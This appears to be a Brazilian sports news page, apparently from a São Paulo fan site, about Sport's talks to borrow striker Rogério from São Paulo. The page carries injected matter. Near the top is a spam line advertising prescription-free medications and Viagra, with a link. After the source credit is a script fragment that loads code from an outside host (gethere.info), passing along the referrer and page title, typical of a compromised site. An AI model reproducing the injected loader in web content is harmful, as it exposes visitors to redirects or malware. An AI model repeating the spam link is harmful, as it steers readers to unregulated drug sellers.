Destaque Noticia

Sport confiante, e São Paulo cauteloso: detalhes da reunião sobre atacante

pills

add in cart cheap medications no prescription – http://mqumag.com/add-in-cart-cheap-medications-no-prescription/ Buy cheap Viagra online

O Sport está muito próximo de anunciar a contratação do atacante Rogério do São Paulo. Pelo menos isso é o que espera o clube rubro-negro depois de algumas horas de reunião no Centro de Treinamento do clube paulista para tentar firmar a contratação do jogador. Os tricolores, por sua vez, adotam um discurso mais cauteloso em relação a negociação, mas não descartam que o martelo pode ser batido nas próximas horas.

A tendência é que Rogério seja emprestado ao Sport até o final desta temporada. O contrato do jogador com o São Paulo vai até o mês de setembro de 2018. Os tricolores querem receber pelo empréstimo do jogador e os rubro-negros estão dispostos a isso, já que precisam de forma emergencial de reforços para o elenco.

Uma pessoa ligada ao Sport ouvida pelo GloboEsporte.com confirmou o otimismo com tudo que foi discutido na reunião da noite desta quinta-feira. A ideia inclusive é que o atacante desembarque no Recife no máximo nesta sexta-feira para já começar os treinamentos no sábado. Como não vai haver tempo hábil para inscrição na Confederação Brasileira de Futebol, a possível estreia deve ficar apenas para a próxima quarta-feira, justamente contra o São Paulo.

Em contrapartida ao otimismo do Sport, os dirigentes do São Paulo estão mais cautelosos. Os tricolores ainda não dão o negócio como fechado, pois ainda estão discutindo mais detalhes da negociação


Aos 25 anos, Rogério é natural de Pesqueira, no interior de Pernambuco e, assim como Ronaldo Alves, tem um passado ligado ao Náutico. Ele foi revelado pelo Porto, de Caruaru, e logo cedo se transferiu para o Timbu, onde jogou de 2011 a 2013. Antes de chegar no São Paulo, o atacante já defendeu também Al Dhafra, dos Emirados Árabes, Botafogo e Vitória.

Rogério foi contratado pelo São Paulo no final do ano passado e já realizou 32 jogos com a camisa tricolor, tendo marcado sete gols. Ele se tornou uma espécie de xodó da torcida são-paulina, mas não vinha tendo chances com o técnico Edgardo Bauza e por isso forçou a saída do Morumbi.

Fonte: Ges.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Destaque Noticia

Mais em Destaque Noticia

Elenco trabalha em dois grupos na reapresentação

saopauloadmin16 de outubro de 2017

Cueva entra na briga pelo título de garçom do Brasileirão 2017

saopauloadmin16 de outubro de 2017

Dorival não abre mão do ataque e elogia 2º turno do São Paulo

saopauloadmin16 de outubro de 2017

Hernanes: ‘A torcida é a única que representa o São Paulo como merece’

saopauloadmin16 de outubro de 2017

Cueva pode desfalcar menos o São Paulo com novas datas do Peru

saopauloadmin15 de outubro de 2017

Petros revela noites em claro para jogar: “São Paulo acima de tudo”

saopauloadmin15 de outubro de 2017

Reforços de peso!

saopauloadmin11 de outubro de 2017

Atlético-MG x São Paulo: Dorival modifica time contra o Galo; veja provável escalação

saopauloadmin11 de outubro de 2017

Dorival quer Reinaldo de volta em 2018. São Paulo pensa em renovar

saopauloadmin11 de outubro de 2017